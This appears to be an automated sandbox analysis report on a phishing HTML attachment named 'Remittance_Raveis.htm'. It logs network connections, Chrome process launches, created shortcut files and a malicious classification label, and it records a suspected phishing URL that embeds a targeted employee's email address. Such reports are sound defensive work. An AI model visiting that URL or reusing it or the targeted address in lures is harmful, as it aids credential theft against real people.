Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65222
Source: unknown Network traffic detected: HTTP traffic on port 64824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65001
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64829
Source: unknown Network traffic detected: HTTP traffic on port 65032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64943
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65006
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65007
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65021
Source: unknown Network traffic detected: HTTP traffic on port 65020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65015
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65019
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65018
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.164.15:443 -> 192.168.2.16:64825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:64830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:64840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:64860 version: TLS 1.2

System Summary

barindex
Source: Name includes: Remittance_Raveis.htm Initial sample: remit
Source: classification engine Classification label: mal60.phis.evad.winHTM@21/191@59/393
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Remittance_Raveis.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,3959010500343283314,1993937045668508339,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,3959010500343283314,1993937045668508339,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://k5f9z1.tingbonteri.com/6IC48/#C#Mbwebb@raveis.com HTTP Parser: https://k5f9z1.tingbonteri.com/6IC48/#C#Mbwebb@raveis.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs